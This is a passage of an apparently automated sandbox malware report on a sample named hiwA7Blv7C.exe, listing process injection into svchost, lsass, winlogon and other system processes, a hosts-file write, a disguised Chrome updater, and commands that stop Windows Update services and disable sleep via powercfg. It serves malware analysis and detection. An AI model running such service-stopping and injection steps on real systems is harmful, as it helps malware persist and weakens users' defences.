                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1110000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5A0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE8A0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD6340000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 247087D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC30000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6963C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: BC80000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE870000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 27140F10000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1B9870D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22B325B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F05EDA0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20CDE980000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E640000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 21A39370000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1411DE90000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 254EE9C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 254EED70000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: PID: 4004 base: BC80000 value: 4D
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeThread register set: target process: 2120Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 6064Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 1060Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 5536Jump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeMemory written: C:\Windows\System32\dialer.exe base: 50DD3E7010Jump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000Jump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000Jump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000Jump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B020000Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: BA5A3A3010Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: D25F83E010Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 7DD3693010Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 200A19E0000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA610000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E630000Jump to behavior
                    Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E380000Jump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016610000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F1540000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E428D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B050000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1110000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5A0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE8A0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD6340000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 247087D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC30000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6963C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: BC80000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE870000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 27140F10000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1B9870D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22B325B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F05EDA0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20CDE980000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E640000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 21A39370000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1411DE90000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 254EE9C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 254EED70000
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D1B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_00007FF68D3D1B54
                    Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF68D3D1B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_00007FF68D3D1B54
                    Source: winlogon.exe, 00000017.00000002.3327131755.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000000.2134232543.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2142138351.000001D154AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                    Source: dwm.exe, 0000001F.00000000.2156368346.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000001F.00000002.3340585756.000001D159439000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: winlogon.exe, 00000017.00000002.3327131755.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000000.2134232543.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2142138351.000001D154AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: winlogon.exe, 00000017.00000002.3327131755.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000000.2134232543.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2142138351.000001D154AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: winlogon.exe, 00000017.00000002.3327131755.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000000.2134232543.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2142138351.000001D154AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165936F0 cpuid 23_2_000002D0165936F0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
